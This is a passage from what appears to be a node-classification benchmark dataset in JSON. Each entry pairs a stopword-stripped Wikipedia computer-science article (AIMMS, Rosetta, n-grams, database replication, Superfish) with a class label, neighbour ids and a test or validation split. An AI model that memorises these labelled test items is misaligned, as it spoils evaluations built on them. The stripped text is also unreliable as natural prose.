october 2017 three initial cloud-based apps supply chain network design sales operations planning data navigator 2018 added center gravity product lifecycle aimms prescriptive analytics platform consists algebraic modeling language integrated development environment editing models creating graphical user interface around models graphical end-user environment aimms linked multiple solvers aimms open solver interface supported solvers include cplex mosek fico xpress cbc conopt minos ipopt snopt knitro cp optimizer aimms features mixture declarative imperative programming styles formulation optimization models takes place declarative language elements sets indices well scalar multidimensional parameters variables constraints common algebraic modeling languages allow concise description problems domain mathematical optimization units measurement natively supported language compile- runtime unit analysis may employed detect modeling errors procedures control flow statements available aimms support re-use common modeling components aimms allows modelers organize model user model libraries aimms supports wide range mathematical optimization problem types uncertainty taken account deterministic linear mixed integer optimization models aimms specification additional attributes stochastic robust optimization techniques applied alongside existing deterministic solution techniques custom hybrid decomposition algorithms constructed using gmp system library makes available modeling level many basic building blocks used internally higher level solution methods present aimms matrix modification methods well specialized steps customizing solution algorithms specific problem types optimization solutions created aimms used either standalone desktop application embedded software component applications aimms prescriptive analytics platform used wide range industries including retail consumer products healthcare oil chemicals steel production agribusiness ge grid uses aimms modeling optimization engine energy market clearing software together ge grid aimms part analytics team midwest iso franz edelman award achievement operations research management sciences 2011 successfully applying operations research midwest iso energy market 2012 tnt express aimms customer franz edleman award modernizing operations reducing carbon footprint aimms platform also used dutch delta team develop implement new method calculating efficient levels flood protection netherlands edelman prize 2013",
    "neighbors": [
      5347,
      5830,
      329,
      4042,
      8113,
      4019,
      2804,
      2901,
      9915,
      6718,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 1040,
    "label": 1,
    "text": "National_Recreation_Database:national recreation database national recreation database nrdb online database canadian parks recreation-related information maintained leisure information network lin national non-profit organization prime intent establishing repository unpublished “ grey ” literature contributed recreation profession national research database makes accessible previously unpublished sector-related literature tools encourage knowledge sharing development amongst canadian recreation leisure practitioners repository also serves awareness promotional tool sharing news trends sector endorsed interprovincial sport recreation council body federal/provincial/territorial government ministers responsible recreation sport active living nrdb continuously growing currently containing 10,000 documents additional 8,300 records program success stories news events job postings etc solicited recreation parks health-promotion quality life organizations across country typical database addition housing resources generates content virtually every page lin website specialized rss feeds subscribers customized content partner websites database visited 65,000 unique users annually download resources valued 3.6m including intended users contribute well retrieve relevant information database information available download cost user proper citation",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1041,
    "label": 7,
    "text": "List_of_BPEL_engines:list bpel engines list notable business process execution language bpel business process model notation bpmn engines",
    "neighbors": [
      2501,
      8070,
      8425,
      10236,
      5677,
      6862,
      3573,
      3894,
      4088,
      5210,
      3323,
      1756,
      7261
    ],
    "mask": "None"
  },
  {
    "node_id": 1042,
    "label": 2,
    "text": "Rosetta_(software):rosetta software rosetta discontinued dynamic binary translator mac os x allowed many powerpc applications run certain intel-based macintosh computers without modification apple released rosetta 2006 changed instruction set architecture macintosh platform powerpc intel processor name rosetta reference rosetta stone discovery made possible comprehend translate egyptian hieroglyphs rosetta based quicktransit technology graphical user interface led apple describe rosetta amazing software 'll never see rosetta initially included mac os x v10.4.4 tiger version released first intel-based macintosh models rosetta installed default mac os x v10.6 snow leopard retained option via installer apple software update users need run powerpc applications rosetta neither included supported mac os x v10.7 lion later therefore lion later releases current macintosh platform support powerpc applications rosetta part mac os x intel operating systems prior lion translates g3 g4 altivec instructions however translate g5 instructions therefore applications rely g5-specific instruction sets must modified developers work rosetta-supported intel-based macs according apple applications heavy user interaction low computational needs word processors well suited translation via rosetta applications high computational needs autocad games adobe photoshop pre-existing powerpc versions apple pro media-production applications final cut pro motion aperture logic pro supported rosetta require crossgrade universal binary version work rosetta-supported intel-based macs rosetta support following reason rosetta reduced compatibility compared apple earlier 68k emulator ppcs lies within implementation rosetta user-level program intercept emulate user-level code older emulator integrated system much lower level 68k emulator given access lowest levels os level tightly connected mac os nanokernel ppc macs later used multiprocessing mac os 8.6 later means nanokernel able intercept powerpc interrupts translate 68k interrupts mixed mode switch necessary executing 68k code handle interrupts allowed lines 68k ppc code interspersed within binary fat application similar effect could likely achieved mac os x running rosetta within xnu apple instead chose implement rosetta user-level process avoid excessive debugging potential security issues",
    "neighbors": [
      4615,
      5647,
      4112,
      4122,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      3167,
      2149,
      8303,
      6771,
      2676,
      9337,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      5358,
      2288,
      7928,
      8441,
      11513,
      7422,
      11521,
      2819,
      1796,
      7941,
      10501,
      10512,
      10516,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      5450,
      9035,
      1878,
      5976,
      4457,
      9100,
      9109,
      1439,
      8102,
      10153,
      8120,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      5612,
      10221,
      499,
      5619,
      11257,
      7163,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1043,
    "label": 2,
    "text": "Broadcast_Driver_Architecture:broadcast driver architecture broadcast driver architecture bda microsoft standard digital video capture microsoft windows operating systems encompasses atsc dvb standards gives developers standardized method accessing tv tuner devices usually pci pci-e usb driver component microsoft tv technologies used hardware vendors create digital tv tuning devices windows also support new network types custom hardware functionality bda documented windows ddk driver development kit platform sdk ideally bda-compliant software compatible bda-compliant hardware applications using bda drivers include web tv windows built windows 98 windows windows xp media center edition mediaportal gb-pvr dvbviewer ulenet several third-party solutions broadcast driver architecture introduced windows 98 part windows driver model",
    "neighbors": [
      10243,
      10769,
      9234,
      11283,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11683,
      3496,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1044,
    "label": 0,
    "text": "N-gram:n-gram fields computational linguistics probability n -gram contiguous sequence n items given sample text speech items phonemes syllables letters words base pairs according application n -grams typically collected text speech corpus items words -grams may also called shingles using latin numerical prefixes n -gram size 1 referred unigram size 2 bigram less commonly digram size 3 trigram english cardinal numbers sometimes used e.g. four-gram five-gram computational biology polymer oligomer known size called k -mer instead n -gram specific names using greek numerical prefixes monomer dimer trimer tetramer pentamer etc. english cardinal numbers one-mer two-mer three-mer etc n -gram model type probabilistic language model predicting next item sequence form n − 1 –order markov model n -gram models widely used probability communication theory computational linguistics instance statistical natural language processing computational biology instance biological sequence analysis data compression two benefits n -gram models algorithms use simplicity scalability – larger n model store context well-understood space–time tradeoff enabling small experiments scale efficiently figure 1 shows several example sequences corresponding 1-gram 2-gram 3-gram sequences examples word-level 3-grams 4-grams counts number times appeared google n -gram corpus 3-grams 4-grams n -gram model models sequences notably natural languages using statistical properties n -grams idea traced experiment claude shannon work information theory shannon posed question given sequence letters example sequence ex likelihood next letter training data one derive probability distribution next letter given history size formula_1 0.4 b 0.00001 c 0 ... probabilities possible next-letters sum 1.0 concisely n -gram model predicts formula_2 based formula_3 probability terms formula_4 used language modeling independence assumptions made word depends last n − 1 words markov model used approximation true underlying language assumption important massively simplifies problem estimating language model data addition open nature language common group words unknown language model together note simple n -gram language model probability word conditioned number previous words one word bigram model two words trigram model etc described following categorical distribution often imprecisely called multinomial distribution practice probability distributions smoothed assigning non-zero probabilities unseen words n -grams see smoothing techniques n -gram models widely used statistical natural language processing speech recognition phonemes sequences phonemes modeled using n -gram distribution parsing words modeled n -gram composed n words language identification sequences characters/graphemes e.g letters alphabet modeled different languages sequences characters 3-grams sometimes referred trigrams generated good morning goo ood od mo mor forth counting space character gram sometimes beginning end text modeled explicitly adding ⁠_g _go ng_ g_ ⁠_ sequences words trigrams shingles generated dog smelled like skunk dog dog smelled dog smelled like smelled like like skunk skunk practitioners interested multiple word terms might preprocess strings remove spaces many simply collapse whitespace single space preserving paragraph marks whitespace frequently either element writing style introduces layout presentation required prediction deduction methodology punctuation also commonly reduced removed preprocessing frequently used trigger functionality n -grams also used sequences words almost type data example used extracting features clustering large sets satellite earth images determining part earth particular image came also successful first pass genetic sequence search identification species short sequences dna originated n -gram models often criticized lack explicit representation long range dependency explicit dependency range n − 1 tokens n -gram model since natural languages incorporate many cases unbounded dependencies wh-movement means n -gram model principle distinguish unbounded dependencies noise since long range correlations drop exponentially distance markov model reason n -gram models made much impact linguistic theory part explicit goal model dependencies another criticism made markov models language including n -gram models explicitly capture performance/competence distinction n -gram models designed model linguistic knowledge make claims even potentially complete models linguistic knowledge instead used practical applications practice n -gram models shown extremely effective modeling language data core component modern statistical language applications modern applications rely n -gram based models machine translation applications rely exclusively models instead typically also incorporate bayesian inference modern statistical models typically made two parts prior distribution describing inherent likelihood possible result likelihood function used assess compatibility possible result observed data language model used used part prior distribution e.g gauge inherent goodness possible translation even often component distribution handcrafted features various sorts also used example variables represent position word sentence general topic discourse addition features based structure potential result syntactic considerations often used features also used part likelihood function makes use observed data conventional linguistic theory incorporated features although practice rare features specific generative particular theories grammar incorporated computational linguists tend agnostic towards individual theories grammar issue using n-gram language models out-of-vocabulary oov words encountered computational linguistics natural language processing input includes words present system dictionary database preparation default language model estimated entire observed vocabulary used cases may necessary estimate language model specific fixed vocabulary scenario n-grams corpus contain out-of-vocabulary word ignored n-gram probabilities smoothed words vocabulary even observed nonetheless essential cases explicitly model probability out-of-vocabulary words introducing special token e.g unk vocabulary out-of-vocabulary words corpus effectively replaced special unk token n-grams counts cumulated option possible estimate transition probabilities n-grams involving out-of-vocabulary words n -grams also used efficient approximate matching converting sequence items set n -grams embedded vector space thus allowing sequence compared sequences efficient manner example convert strings letters english alphabet single character 3-grams get formula_5-dimensional space first dimension measures number occurrences aaa second aab forth possible combinations three letters using representation lose information string example strings abc bca give rise exactly 2-gram bc although ab bc clearly bc ca however know empirically two strings real text similar vector representation measured cosine distance likely similar metrics also applied vectors n -grams varying sometimes better results example z-scores used compare documents examining many standard deviations n -gram differs mean occurrence large collection text corpus documents form background vector event small counts g-score also known g-test may give better results comparing alternative models also possible take principled approach statistics n -grams modeling similarity likelihood two strings came source directly terms problem bayesian inference n -gram-based searching also used plagiarism detection n -grams find use several areas computer science computational linguistics applied mathematics used choose value n n -gram model necessary find right trade stability estimate appropriateness means trigram i.e triplets words common choice large training corpora millions words whereas bigram often used smaller ones problems balance weight infrequent grams example proper name appeared training data frequent grams also items seen training data given probability 0.0 without smoothing unseen plausible data sample one introduce pseudocounts pseudocounts generally motivated bayesian grounds practice necessary smooth probability distributions also assigning non-zero probabilities unseen words n -grams reason models derived directly n -gram frequency counts severe problems confronted n -grams explicitly seen – zero-frequency problem various smoothing methods used simple add-one laplace smoothing assign count 1 unseen n -grams see rule succession sophisticated models good–turing discounting back-off models methods equivalent assigning prior distribution probabilities n -grams using bayesian inference compute resulting posterior n -gram probabilities however sophisticated smoothing models typically derived fashion instead independent considerations field computational linguistics particular language modeling skip-grams generalization n -grams components typically words need consecutive text consideration may leave gaps skipped provide one way overcoming data sparsity problem found conventional n -gram analysis formally -gram consecutive subsequence length sequence tokens -skip -- gram length- subsequence components occur distance example input text set 1-skip-2-grams includes bigrams 2-grams addition subsequences syntactic n -grams n -grams defined paths syntactic dependency constituent trees rather linear structure text example sentence economic news little effect financial markets transformed syntactic n -grams following tree structure dependency relations news-economic effect-little effect-on-markets-financial syntactic n -grams intended reflect syntactic structure faithfully linear n -grams many applications especially features vector space model syntactic n -grams certain tasks gives better results use standard n -grams example authorship attribution another type syntactic n -grams part-of-speech n -grams defined fixed-length contiguous overlapping subsequences extracted part-of-speech sequences text part-of-speech n -grams several applications commonly information retrieval",
    "neighbors": [
      5122,
      8323,
      264,
      2440,
      2059,
      6798,
      11538,
      1044,
      1941,
      5399,
      538,
      3998,
      3748,
      2858,
      7599,
      10160,
      4531,
      4662,
      3127,
      2488,
      8759,
      10557,
      3646,
      6208,
      6336,
      586,
      203,
      3533,
      5197,
      6223,
      10319,
      8538,
      5214,
      5857,
      1890,
      5218,
      7780,
      4070,
      4072,
      1771,
      7918,
      8046,
      8688,
      4468,
      10231,
      8440,
      7164
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1045,
    "label": 9,
    "text": "Edinburgh_IMP:edinburgh imp edinburgh imp development atlas autocode initially developed around 1966-1969 edinburgh university scotland imp general-purpose programming language used heavily systems programming expressively imp extremely similar algol includes algol-style block structure reserved keywords datatypes arrays records adds algol-style languages string type akin flex array char built-in operators string manipulation character handling imp provides significant control storage mapping data plus commands addressing within parts words imp compilers offer compiler-generated run-time checks backtrace facility default even production code imp allows programmer inline machine language instructions imp source code early imp compilers developed english electric kdf9 icl system 4 univac 1108 ibm 360 dec pdp-9 dec pdp-15 ctl modular one computers imp used implement emas operating system later years version imp called imp77 developed peter robertson within computer science department edinburgh portable compiler brought imp even platforms 2002 imp77 language resurrected edinburgh computer history project intel x86 hardware running dos windows linux use edinburgh graduates ex-pats diverged imp imp77 later consolidated single language introduction imp80 standard supported implementations edinburgh regional computer centre imp80 also ported several platforms including intel actively use 1990s edinburgh imp unrelated later imp developed irons cdc 6600 main language used nsa many years",
    "neighbors": [
      512,
      1952,
      486,
      1610,
      7983,
      2650
    ],
    "mask": "None"
  },
  {
    "node_id": 1046,
    "label": 4,
    "text": "Superfish:superfish superfish advertising company developed various advertising-supported software products based visual search engine company based palo alto california founded israel 2006 regarded part country download valley cluster adware companies superfish software described malware adware many sources software bundled various applications early 2010 lenovo began bundle software computers september 2014 february 20 2015 united states department homeland security advised uninstalling associated root certificate make computers vulnerable serious cyberattacks including interception passwords sensitive data transmitted browsers superfish founded 2006 adi pinhas michael chertok pinhas graduate tel aviv university 1999 co-founded vigilant technology “ invented digital video recording surveillance market ” according linkedin profile worked verint intelligence company analyzed telephone signals allegedly tapped verizon communication lines chertok graduate technion bar-ilan university 10 years experience large scale real-time data mining systems since founding superfish used team dozen phds primarily develop algorithms comparison matching images released first product windowshopper 2011 windowshopper immediately prompted large number complaints internet message boards users n't know software installed machines superfish initially received funding draper fisher jurvetson date raised 20 million mostly dfj vintage investment partners forbes listed company number 64 list america promising companies pinhas 2014 stated visual search replace keyboard ... visual search cases words describe see 2014 superfish products 80 million users may 2015 following lenovo security incident see distance fallout team behind superfish changed name moved activities justvisual.com users expressed concerns scans ssl-encrypted web traffic superfish visual search software pre-installed lenovo machines since least early december 2014 became major public issue however february 2015 installation included universal self-signed certificate authority certificate authority allows man-in-the-middle attack introduce ads even encrypted pages certificate authority private key across laptops allows third-party eavesdroppers intercept modify https secure communications without triggering browser warnings either extracting private key using self-signed certificate. ref name= komodia/superfish ssl validation broken /ref february 20 2015 microsoft released update windows defender removes superfish article slate tech writer david auerbach compares incident sony drm rootkit scandal said lenovo actions installing superfish one irresponsible mistakes established tech company ever made february 24 2015 heise security published article revealing certificate question would also spread number applications companies including say media lavasoft ad-aware web companion criticisms superfish software predated lenovo incident limited lenovo user community early 2010 apple mozilla firefox microsoft windows users expressed concerns online support discussion forums superfish software installed computers without knowledge bundled software ceo pinhas statement prompted lenovo disclosures maintained security flaw introduced superfish software directly attributable code rather appears third-party add-on introduced potential vulnerability know product identified source problem code authored tech company komodia deals among things website security certificates komodia code also present applications among parental-control software experts said komodia tool could imperil company program using code found within superfish fact komodia refers https-decrypting interception software ssl hijacker since least january 2011 use 100 corporate clients may jeopardize sensitive data lenovo customers also much larger base pc users superfish first product windowshopper developed browser add-on desktop mobile devices directing users hover browser images shopping web sites purchase similar products 2014 windowshopper approximately 100 million monthly users according xconomy high conversion sale rate soft goods superfish business model based receiving affiliate fees sale core technology superfish visualdiscovery installed man-in-the-middle proxy lenovo laptops injects advertising results internet search engines also intercepts encrypted ssl/tls connections 2014 superfish released new apps based image search technology",
    "neighbors": [
      4478,
      8674,
      517,
      106,
      9771,
      877,
      6382,
      5935,
      6797,
      10448,
      10392,
      7515,
      4605,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1047,
    "label": 3,
    "text": "Apache_Apex:apache apex apache apex yarn-native platform unifies stream batch processing processes big data-in-motion way scalable performant fault-tolerant stateful secure distributed easily operable apache apex named top-level project apache software foundation april 25 2016 apache apex developed apache license 2.0 project driven san jose california-based start-up company datatorrent two parts apache apex apex core apex malhar apex core platform framework building distributed applications hadoop core apex platform supplemented malhar library connector logic functions enabling rapid application development input output operators provide templates sources sinks alluxio s3 hdfs nfs ftp kafka activemq rabbitmq jms cassandra mongodb redis hbase couchdb generic jdbc database connectors datatorrent developed platform since 2012 decided open source core became apache apex entered incubation august 2015 became apache software foundation top level project within 8 months datatorrent shuts may 2018 apex big data world conference apache apex first conference apex big data world took place 2017 held pune india mountain view california usa",
    "neighbors": [
      10377,
      8460,
      7567,
      1296,
      2193,
      6161,
      1913,
      8217,
      6555,
      8860,
      11161,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      7347,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      7364,
      11201,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      7802,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      3558,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      3705,
      1018,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 1048,
    "label": 7,
    "text": "Cloud_manufacturing:cloud manufacturing cloud manufacturing cmfg new manufacturing paradigm developed existing advanced manufacturing models e.g. asp nm mgrid enterprise information technologies support cloud computing internet things iot virtualization service-oriented technologies advanced computing technologies transforms manufacturing resources manufacturing capabilities manufacturing services managed operated intelligent unified way enable full sharing circulating manufacturing resources manufacturing capabilities cmfg provide safe reliable high quality cheap on-demand manufacturing services whole lifecycle manufacturing concept manufacturing refers big manufacturing includes whole lifecycle product e.g design simulation production test maintenance concept cloud manufacturing initially proposed research group led prof. bo hu li prof. lin zhang china 2009. cloud manufacturing introduced cloud manufacturing type parallel networked distributed system consisting integrated inter-connected virtualized service pool manufacturing cloud manufacturing resources capabilities well capabilities intelligent management on-demand use services provide solutions kinds users involved whole lifecycle manufacturing cloud manufacturing divided two categories cmfg system various manufacturing resources abilities intelligently sensed connected wider internet automatically managed controlled using iot technologies e.g. rfid wired wireless sensor network embedded system manufacturing resources abilities virtualized encapsulated different manufacturing cloud services mcss accessed invoked deployed based knowledge using virtualization technologies service-oriented technologies cloud computing technologies mcss classified aggregated according specific rules algorithms different kinds manufacturing clouds constructed different users search invoke qualified mcss related manufacturing cloud according needs assemble virtual manufacturing environment solution complete manufacturing task involved whole life cycle manufacturing processes support cloud computing service-oriented technologies advanced computing technologies four types cloud deployment modes public private community hybrid clouds ubiquitous single point access resource ’ perspective kind manufacturing capability requires support related manufacturing resource type manufacturing capability related manufacturing resource comes two forms soft resources hard resources",
    "neighbors": [
      5689,
      4194,
      11117,
      9797
    ],
    "mask": "None"
  },
  {
    "node_id": 1049,
    "label": 3,
    "text": "Replication_(computing):replication computing replication computing involves sharing information ensure consistency redundant resources software hardware components improve reliability fault-tolerance accessibility replication computing refer replication space time often linked scheduling algorithms access replicated entity typically uniform access single non-replicated entity replication transparent external user failure scenario failover replicas hidden much possible respect quality service qos computer scientists describe replication either one master replica designated process requests system using primary-backup master-slave scheme predominant high-availability clusters comparison replica process request distribute new state system using multi-primary multi-master scheme latter case form distributed concurrency control must used distributed lock manager load balancing differs task replication since distributes load different computations across machines allows single computation dropped case failure load balancing however sometimes uses data replication especially multi-master replication internally distribute data among machines backup differs replication saved copy data remains unchanged long period time replicas hand undergo frequent updates quickly lose historical state replication one oldest important topics overall area distributed systems data replication computation replication require processes handle incoming events processes data replication passive operate maintain stored data reply read requests apply updates computation replication usually performed provide fault-tolerance take operation one component fails cases underlying needs ensure replicas see events equivalent orders stay consistent states replica respond queries three widely cited models exist data replication properties performance database replication used many database management systems dbms usually master-slave relationship original copies master logs updates ripple slaves slave outputs message stating received update successfully thus allowing sending subsequent updates multi-master replication updates submitted database node ripple servers often desired introduces substantially increased costs complexity may make impractical situations common challenge exists multi-master replication transactional conflict prevention resolution synchronous eager replication solutions perform conflict prevention asynchronous lazy solutions perform conflict resolution instance record changed two nodes simultaneously eager replication system would detect conflict confirming commit abort one transactions lazy replication system would allow transactions commit run conflict resolution resynchronization resolution conflict may based timestamp transaction hierarchy origin nodes much complex logic decides consistently across nodes database replication becomes complex scales usually described two dimensions horizontal vertical horizontal scale-up data replicas vertical scale-up data replicas located greater physical distances problems raised horizontal scale-up alleviated multi-layer multi-view access protocol early problems vertical scale-up largely addressed improving internet reliability performance data replicated database servers information remains consistent throughout database system users tell even know server dbms using system said exhibit replication transparency active real-time storage replication usually implemented distributing updates block device several physical hard disks way file system supported operating system replicated without modification file system code works level block device driver layer implemented either hardware disk array controller software device driver basic method disk mirroring typical locally connected disks storage industry narrows definitions mirroring local short-distance operation replication extendable across computer network disks located physically distant locations master-slave database replication model usually applied purpose replication prevent damage failures disasters may occur one location – case events occur improve ability recover data replication latency key factor determines either far apart sites type replication employed main characteristic cross-site replication write operations handled either synchronous asynchronous replication main difference synchronous replication needs wait destination server write operation synchronous replication guarantees zero data loss means atomic write operations write operation considered complete acknowledged local remote storage applications wait write transaction complete proceeding work hence overall performance decreases considerably inherently performance drops proportionally distance minimum latency dictated speed light 10 km distance fastest possible roundtrip takes 67 μs whereas entire local cached write completes 10–20 μs asynchronous replication write operation considered complete soon local storage acknowledges remote storage updated small lag performance greatly increased case local storage failure remote storage guaranteed current copy data recent data may lost semi-synchronous replication typically considers write operation complete acknowledged local storage received logged remote server actual remote write performed asynchronously resulting better performance remote storage lag behind local storage guarantee durability i.e seamless transparency case local storage failure point-in-time replication produces periodic snapshots replicated instead primary storage intended replicate changed data instead entire volume less information replicated using method replication occur less-expensive bandwidth links iscsi t1 instead fiber optic lines many distributed filesystems use replication ensure fault tolerance avoid single point failure many commercial synchronous replication systems freeze remote replica fails loses connection – behaviour guarantees zero data loss – proceed operate locally losing desired zero recovery point objective techniques wide-area network wan optimization applied address limits imposed latency file-based replication conducts data replication logical level i.e individual data files rather storage block level many different ways performing almost exclusively rely software kernel driver specifically filter driver used intercept calls filesystem functions capturing activity occurs utilises type technology real-time active virus checkers employ level logical file operations captured like file open write delete etc kernel driver transmits commands another process generally network different machine mimic operations source machine like block-level storage replication file-level replication allows synchronous asynchronous modes synchronous mode write operations source machine held allowed occur destination machine acknowledged successful replication synchronous mode less common file replication products although solutions exist file-level replication solutions allow informed decisions replication based location type file example temporary files parts filesystem hold business value could excluded data transmitted also granular application writes 100 bytes 100 bytes transmitted instead complete disk block generally 4096 bytes substantially reduces amount data sent source machine storage burden destination machine drawbacks software-only solution include requirement implementation maintenance operating system level increased burden machine processing power similarly database transaction logs many file systems ability journal activity journal sent another machine either periodically real time streaming replica side journal used play back file system modifications one notable implementations microsoft system center data protection manager dpm released 2005 performs periodic updates offer real-time replication process comparing source destination file systems ensuring destination matches source key benefit solutions generally free inexpensive downside process synchronizing quite system-intensive consequently process generally runs infrequently one notable implementations rsync another example using replication appears distributed shared memory systems many nodes system share page memory usually means node separate copy replica page many classical approaches replication based primary-backup model one device process unilateral control one processes devices example primary might perform computation streaming log updates backup standby process take primary fails approach common replicating databases despite risk portion log lost failure backup might state identical primary transactions could lost weakness primary-backup schemes one actually performing operations fault-tolerance gained identical backup system doubles costs reason starting distributed systems research community began explore alternative methods replicating data outgrowth work emergence schemes group replicas could cooperate process acting backup also handling share workload computer scientist jim gray analyzed multi-primary replication schemes transactional model published widely cited paper skeptical approach dangers replication solution argued unless data splits natural way database treated n disjoint sub-databases concurrency control conflicts result seriously degraded performance group replicas probably slow function n gray suggested common approaches likely result degradation scales n³ solution partition data viable situations data actually natural partitioning key 1985–1987 virtual synchrony model proposed emerged widely adopted standard used isis toolkit horus transis ensemble totem spread c-ensemble phoenix quicksilver systems basis corba fault-tolerant computing standard virtual synchrony permits multi-primary approach group processes cooperates parallelize aspects request processing scheme used forms in-memory data provide linear speedups size group number modern products support similar schemes example spread toolkit supports virtual synchrony model used implement multi-primary replication scheme would also possible use c-ensemble quicksilver manner wandisco permits active replication every node network exact copy replica hence every node network active one time scheme optimized use wide area network wan",
    "neighbors": [
      2051,
      10258,
      2068,
      5658,
      9248,
      10272,
      9762,
      10793,
      10286,
      9782,
      1594,
      11324,
      1086,
      10302,
      8772,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      7256,
      4194,
      9828,
      10340,
      4710,
      8295,
      8808,
      3692,
      2669,
      1136,
      6769,
      11377,
      9844,
      1142,
      9335,
      121,
      1146,
      7802,
      3196,
      639,
      9343,
      2689,
      9360,
      3219,
      10389,
      4255,
      1701,
      4263,
      5287,
      10413,
      7347,
      9397,
      6331,
      7868,
      6850,
      2246,
      3784,
      6346,
      8401,
      2264,
      2780,
      734,
      10471,
      6383,
      7409,
      7412,
      4861,
      3326,
      2314,
      2834,
      8979,
      7446,
      10518,
      3864,
      11030,
      5403,
      7453,
      6433,
      1314,
      7972,
      3366,
      2344,
      7983,
      1341,
      10048,
      5953,
      3398,
      8008,
      7499,
      5452,
      2901,
      10069,
      3927,
      2395,
      8539,
      11612,
      1891,
      1382,
      5482,
      7018,
      9069,
      9585,
      6003,
      9075,
      3450,
      6014,
      2944,
      10632,
      1421,
      2456,
      9112,
      10137,
      9634,
      2980,
      1447,
      7080,
      5047,
      3004,
      6591,
      1990,
      1993,
      9677,
      2515,
      987,
      4065,
      6124,
      2544,
      10737,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 1050,
    "label": 7,
    "text": "Virtual_Object_System:virtual object system virtual object system vos computer software technology creating distributed object systems sites hosting vobjects typically linked computer network local area network internet vobjects may send messages vobjects network links remotely within host site locally perform actions synchronize state way vos may also called object-oriented remote procedure call system addition vobjects may number directed relations vobjects allows form directed graph data structures vos patent free implementation free software primary application focus vos general purpose multiuser collaborative 3d virtual environments virtual reality primary designer author vos peter amstutz",
    "neighbors": [
      9441,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 1051,
    "label": 9,
    "text": "Reactive_programming:reactive programming computing reactive programming declarative programming paradigm concerned data streams propagation change paradigm possible express static e.g. arrays dynamic e.g. event emitters data streams ease also communicate inferred dependency within associated execution model exists facilitates automatic propagation changed data flow example imperative programming setting formula_1 would mean formula_2 assigned result formula_3 instant expression evaluated later values formula_4 formula_5 changed effect value formula_2 hand reactive programming value formula_2 automatically updated whenever values formula_4 formula_5 change without program re-execute statement formula_1 determine presently assigned value formula_11 another example hardware description language verilog reactive programming enables changes modeled propagate circuits reactive programming proposed way simplify creation interactive user interfaces near-real-time system animation example model–view–controller mvc architecture reactive programming facilitate changes underlying model reflected automatically associated view several popular approaches employed creation reactive programming languages specification dedicated languages specific various domain constraints constraints usually characterized real-time embedded computing hardware description another approach involves specification general-purpose languages include support reactivity approaches articulated definition use programming libraries embedded domain-specific languages enable reactivity alongside top programming language specification use different approaches results language capability trade-offs general restricted language associated compilers analysis tools able inform developers e.g. performing analysis whether programs able execute actual real time functional trade-offs specificity may result deterioration general applicability language variety models semantics govern family reactive programming loosely split along following dimensions reactive programming language runtimes represented graph identifies dependencies among involved reactive values graph nodes represent act computing edges model dependency relationships runtime employs said graph help keep track various computations must executed anew involved input changes value various abstract implementation approaches enable specification reactive programming flow data explicitly described employment graph common algorithms implementation level event reaction consists propagation across graph information characterizes existence change consequently computations affected change become outdated must flagged re-execution computations usually characterized transitive closure change associated source change propagation may lead update value graph sinks graph propagated information consist node complete state i.e. computation result involved node cases node previous output ignored another method involves delta propagation i.e incremental change propagation case information proliferated along graph edges consist delta describing previous node changed approach especially important nodes hold large amounts state data would otherwise expensive recompute scratch delta propagation essentially optimization extensively studied via discipline incremental computing whose approach requires runtime satisfaction involving view-update problem problem infamously characterized use database entities responsible maintenance changing data views another common optimization employment unary change accumulation batch propagation solution faster reduces communication among involved nodes optimization strategies employed reason nature changes contained within make alterations accordingly e.g two changes batch cancel thus simply ignored yet another available approach described invalidity notification propagation approach causes nodes invalid input pull updates thus resulting update outputs two principal ways employed building dependency graph propagating changes possible pick propagation orders value expression natural consequence source program illustrate easily example suppose codice_1 reactive value changes every second represent current time seconds consider expression codice_2 always greater codice_1 expression always evaluate true value unfortunately depend order evaluation codice_1 changes two expressions update codice_5 conditional first evaluates second invariant hold however conditional updates first using old value codice_2 new value codice_1 expression evaluate false value called glitch reactive languages glitch-free prove property usually achieved topologically sorting expressions updating values topological order however performance implications delaying delivery values due order propagation cases therefore reactive languages permit glitches developers must aware possibility values may temporarily fail correspond program source expressions may evaluate multiple times instance codice_8 may evaluate twice new value codice_1 arrives codice_2 updates topological sorting dependencies depends dependency graph directed acyclic graph dag practice program may define dependency graph cycles usually reactive programming languages expect cycles broken placing element along back edge permit reactive updating terminate typically languages provide operator like codice_11 used update mechanism purpose since codice_11 implies follows must evaluated next time step allowing current evaluation terminate reactive languages typically assume expressions purely functional allows update mechanism choose different orders perform updates leave specific order unspecified thereby enabling optimizations reactive language embedded programming language state however may possible programmers perform mutable operations make interaction 